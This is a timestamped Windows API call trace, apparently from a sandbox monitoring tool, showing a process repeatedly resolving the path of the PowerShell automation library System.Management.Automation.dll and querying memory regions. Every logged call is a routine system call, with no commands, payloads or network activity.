	[0317.773] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.773] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.773] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.774] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.774] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.774] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.774] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.774] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.774] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.774] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.774] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.775] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.775] VirtualQuery (in: lpAddress=0x28ba90, lpBuffer=0x28c950, dwLength=0x30 | out: lpBuffer=0x28c950*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.059] VirtualQuery (in: lpAddress=0x28ba90, lpBuffer=0x28c950, dwLength=0x30 | out: lpBuffer=0x28c950*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.060] VirtualQuery (in: lpAddress=0x28ba90, lpBuffer=0x28c950, dwLength=0x30 | out: lpBuffer=0x28c950*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.060] VirtualQuery (in: lpAddress=0x28b180, lpBuffer=0x28c040, dwLength=0x30 | out: lpBuffer=0x28c040*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.060] VirtualQuery (in: lpAddress=0x28b210, lpBuffer=0x28c0d0, dwLength=0x30 | out: lpBuffer=0x28c0d0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.060] VirtualQuery (in: lpAddress=0x28b8f0, lpBuffer=0x28c7b0, dwLength=0x30 | out: lpBuffer=0x28c7b0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.060] VirtualQuery (in: lpAddress=0x28b980, lpBuffer=0x28c840, dwLength=0x30 | out: lpBuffer=0x28c840*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.061] VirtualQuery (in: lpAddress=0x28b8f0, lpBuffer=0x28c7b0, dwLength=0x30 | out: lpBuffer=0x28c7b0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.061] VirtualQuery (in: lpAddress=0x28b980, lpBuffer=0x28c840, dwLength=0x30 | out: lpBuffer=0x28c840*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.061] VirtualQuery (in: lpAddress=0x28b980, lpBuffer=0x28c840, dwLength=0x30 | out: lpBuffer=0x28c840*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.061] VirtualQuery (in: lpAddress=0x28b8f0, lpBuffer=0x28c7b0, dwLength=0x30 | out: lpBuffer=0x28c7b0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.061] VirtualQuery (in: lpAddress=0x28b980, lpBuffer=0x28c840, dwLength=0x30 | out: lpBuffer=0x28c840*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.061] VirtualQuery (in: lpAddress=0x28b8f0, lpBuffer=0x28c7b0, dwLength=0x30 | out: lpBuffer=0x28c7b0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.061] VirtualQuery (in: lpAddress=0x28b980, lpBuffer=0x28c840, dwLength=0x30 | out: lpBuffer=0x28c840*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.061] VirtualQuery (in: lpAddress=0x28b8f0, lpBuffer=0x28c7b0, dwLength=0x30 | out: lpBuffer=0x28c7b0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.071] VirtualQuery (in: lpAddress=0x28b980, lpBuffer=0x28c840, dwLength=0x30 | out: lpBuffer=0x28c840*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0318.071] VirtualQuery (in: lpAddress=0x28b5c0, lpBuffer=0x28c480, dwLength=0x30 | out: lpBuffer=0x28c480*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0318.071] VirtualQuery (in: lpAddress=0x28b8f0, lpBuffer=0x28c7b0, dwLength=0x30 | out: lpBuffer=0x28c7b0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0318.072] VirtualQuery (in: lpAddress=0x28b980, lpBuffer=0x28c840, dwLength=0x30 | out: lpBuffer=0x28c840*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0318.072] VirtualQuery (in: lpAddress=0x28b8f0, lpBuffer=0x28c7b0, dwLength=0x30 | out: lpBuffer=0x28c7b0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0318.072] VirtualQuery (in: lpAddress=0x28b980, lpBuffer=0x28c840, dwLength=0x30 | out: lpBuffer=0x28c840*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0318.072] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0xa1499425, Data2=0x5bdd, Data3=0x4e6e, Data4=([0]=0x89, [1]=0x4b, [2]=0xb2, [3]=0x8e, [4]=0xe6, [5]=0x2b, [6]=0xd6, [7]=0xde))) returned 0x0
	[0318.072] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.072] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
